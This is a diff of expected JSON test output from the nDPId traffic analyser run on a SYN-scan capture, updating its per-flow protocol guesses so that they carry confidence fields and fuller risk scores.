 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00696{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","ndpi": {"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
+00696{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5746,9 +5746,9 @@
 00572{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}}
+00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}}
+00783{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -5786,17 +5786,17 @@
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00588{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00600{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056403,"flow_last_seen":1278275056403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00603{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
